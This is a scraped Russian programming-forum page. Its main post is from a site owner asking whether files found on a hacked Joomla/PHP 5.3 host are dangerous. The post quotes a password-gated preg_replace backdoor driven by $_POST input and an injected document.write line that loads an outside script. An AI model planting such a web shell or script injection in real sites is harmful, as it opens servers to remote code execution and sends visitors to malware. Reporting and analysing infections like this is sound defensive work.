Форум программистов, компьютерный форум, киберфорум
PHP
Войти
Регистрация
Восстановить пароль
Другие темы раздела
PHP Проверка, включен ли у пользователя JavaScript, при помощи PHP Хочу сделать на сайте проверку, включен ли у пользователя javascript или нет, при помощи PHP, так как думаю что при помощи Javascript'а врятли получиться проверить включен ли он у него если у него он выключен =) Если такая возможность или есть какой-то другой оригинальный способ узнать об этом? https://www.cyberforum.ru/ php/ thread1053388.html тесты и их повтор PHP
опишу ситуацию: использую Symfony2 + ExtJS4 1. есть класс AdditionalFilter, если я ему передам неправильные данные, он выдаст исключение 2. есть контроллер, при выдаче исключения во время работы он должен создать ответ для клиента с сообщением исключения. Так вот, я повторяю проверку на это исключение в тесте, который 100% покрывает AdditionalFilter, и в тесте который проверяет ответы от...
PHP Как создать рейтинг фотографий на сайте Идя такая - создать интерактивный рейтинг фотографий, ну например на странице отображается 10 фоток столбиком и можно за них голосовать. И что бы они автоматически группировались по рейтингу, и что бы рейтинг так же где то отображался либо рядом с фотографией либо на ней. Я новичок в этом деле, поэтому не ругайте сильно. Очень хочется разобраться! Заранее спасибо!) Сделать надо... https://www.cyberforum.ru/ php/ thread1052782.html PHP локальная сеть и php Есть компьютерный класс. Все компьютеры соединены в локалтную сеть через wifi роутер. Как сделать так, чтобы на одном компе я запустил denwer и сделал небольшой сайт и на всех компах можно было этот локальный сайт посетить через браузер? https://www.cyberforum.ru/ php/ thread1052652.html
Парсинг одноклассников PHP
Здравствуйте форумчане! Заранее прошу прощения у админа, возможно надо было писать в раздел "Соцсети". Второй день гуглю в поисках решения, что-то никак... Проблема в следующем: при парсинге одноклассников курлом все картинки заменяются на "Фотография находится на сайте одноклассники". Ссылки на картинки, насколько могу видеть те же. Подскажите где копать чтобы адекватно отображались все...
PHP Это правда? PHP Devel Studio https://www.cyberforum.ru/ php/ thread1051353.html
Нашел в сети такую прогу под названием "PHP Devel Studio" описание следующее: Полноценная среда программирования, которая позволяет создавать exe программы на языке PHP с поддержкой GUI или без программирования. Теперь, для создания программ достаточно знать самый популярный язык программирования PHP. Тоесть она что его в машинный код преобразует? Кто имел дело разъясните пжл! Добавлено...
PHP Древовидный раскрывающийся список Доброго времени суток:) У меня такая проблема: у меня есть древовидный раскрывающийся список. В нём есть разделы, подразделы и т.д. Мне надо чтобы название разделов, подразделов и т.д. подгружались из текстового файла. В этом текстовом файле будет содержаться строка, разделённые определёнными символами конца названия. Пример: раздел 1; подраздел 1,1; подраздел 1.1.1; При изменении строки в этом... https://www.cyberforum.ru/ php/ thread1051264.html PHP Нужно разобраться в правке php на Wordpress
Здравствуйте. В php полный ноль, по этому бьюсь над проблемой почти целые сутки. Необходимо чтобы цитаты wordpress выводились в блоках на главной с определенным количеством символов и заканчивались целым словом, а в категориях с другим количеством. Зачем мне это нужно? Цитаты в Wordpress решат проблему частичных дублей, как это бывает с тегом <!more> С цитатами все страницы будут уникальны....
PHP Авторизация c $_SESSION и $_COOKIE на PHP сайте Привет всем! У меня есть проблема с сессиями. Объясню подробнее: У меня стоит Apache2.2 и PHP 5.4 шаренная папка localhost для сайтов, и в этой папке другие папки(разные сайты). И в некоторых сайтах у меня есть один и тот же скрипт на авторизацию. А проблема в том что на тех сайтах в которых стоит этот скрипт, при авторизации с 1 браузера(как известно сессия длится пока живет браузер) Имена... https://www.cyberforum.ru/ php/ thread1050728.html PHP Не могу войти в phpMyAdmin Не могу войти в phpMyAdmin, при переходе на адрес ip/phpmyadmin выскакивает окошко и я никак не могу зайти, не знаю что прописывать. Ниже показано то самое окошко и файл конфиг. config.inc.php <?php $i=0; $i++; $cfg = 'root'; $cfg = 'pass'; // use here your password ?> https://www.cyberforum.ru/ php/ thread1050008.html
PHP Модуль новости
Допустим требуется сделать модуль новостей на сайте. 1. Для вывода списка новостей я создал файл news.php (Адрес: site.com/index.php?page=news) в этом файле из бд выводятся новости, проблем с этим пунктом нет! 2. Создан файл createnews.php (Адрес: site.com/index.php?page=?page=createnews) здесь происходит создание новости, т.е. заносятся данные в бд, проблем с этим пунктом нет! 3. Есть файл...
PHP PHP и GPS глонасс Ребят, как вообще реализовать, чтобы была карта и на карте отображалось, где находится автомобиль? https://www.cyberforum.ru/ php/ thread1049596.html
217 / 157 / 30
Регистрация: 11.05.2010
Сообщений: 614
0

preg_replace() и $_POST, есть ли тут дыра в безопасности? - PHP - Ответ 5549759

24.12.2013, 12:19. Показов 1477. Ответов 2
Метки (Все метки)

Author24 — интернет-сервис помощи студентам
Вот о чём речь:
В некоторых местах на хостинге появились файлы с содержимым:
PHP
1
2
3
4
<?php
if (md5($_POST['p']) == '227632b72cb3d5d1b86d25ab190c0a88') {
    preg_replace($_POST['v1'], $_POST['v2'], $_POST['v3']);
}
Также к ним время от времени идёт обращение извне злоумышленником.

Кроме того, регулярно появляются в js библиотеках(типа jquery) в конце запись, типа такой:
Javascript
1
;document.write("<scr"+"ipt src='mysite.com/[some_address]/[some_file].js'><"+"/script>");
Ну и, понятное дело, из-за этого [some_file].js меня блочит яндекс. (Troj/JSRedir-MN)

Вопрос в том, что же такого страшного написано в php-файле и может ли это быть связано с проблемой с js?

(что такое preg_replace я вкурсе, но вот почему он тут не пойму)
PHP 5.3
сайт на Joomla!1.5

Вернуться к обсуждению:
preg_replace() и $_POST, есть ли тут дыра в безопасности? PHP
0
Заказать работу у эксперта
Programming
Эксперт
94731 / 64177 / 26122
Регистрация: 12.04.2006
Сообщений: 116,782
24.12.2013, 12:19
Готовые ответы и решения:

Есть ли тут такие, у кого есть свои идеи ,касающиеся компьютерной безопасности,например, по защите от вирусов?
Есть ли тут такие, у кого есть свои идеи ,касающиеся компьютерной безопасности,например, по защите...

Может какая-то дыра в безопасности?
Сервер на Debian, похоже, подцепил какую-то бяку, она заразила сайт на этом сервере. Подписывает...

Даны натуральные числа n, k. Проверить, есть ли в записи числа nk цифра m. тут число n в степени k, то есть k
Даны натуральные числа n, k. Проверить, есть ли в записи числа nk цифра m. Надо оформить данный...

Есть ли тут UB ?
Добрый день, не могу разобрать вот такую ситуацию: #include &lt;iostream&gt; using namespace std; ...

2
24.12.2013, 12:19
IT_Exp
Эксперт
87844 / 49110 / 22898
Регистрация: 17.06.2006
Сообщений: 92,604
24.12.2013, 12:19
Помогаю со студенческими работами здесь

Есть ли тут CMS
Задачи изменить тексты на сайте www.negruta.md. Заказчик не знает ничего о разработке и я тоже. По...

Есть ли тут живность?
Здравствуйте. Пока проблем с компьютером (другим) нет, но хотелось бы сделать аварийный образ...

Тут есть Ошибка?
using System; using System.Collections.Generic; using System.Linq; using System.Text; ...

Есть тут радиолюбители ?
Народ, помогите мне, объясните простым языком что это и как оно работает. 1 RS-триггеры 2 регистр...

А тут есть фалообменник
фалообменник присутствует на этом сайте.

Есть ли тут ошибки
1. Найти номер максимального элемента массива. int main() { const int SIZE=10; int...

0
КиберФорум - форум программистов, компьютерный форум, программирование
Powered by vBulletin
Copyright ©2000 - 2024, CyberForum.ru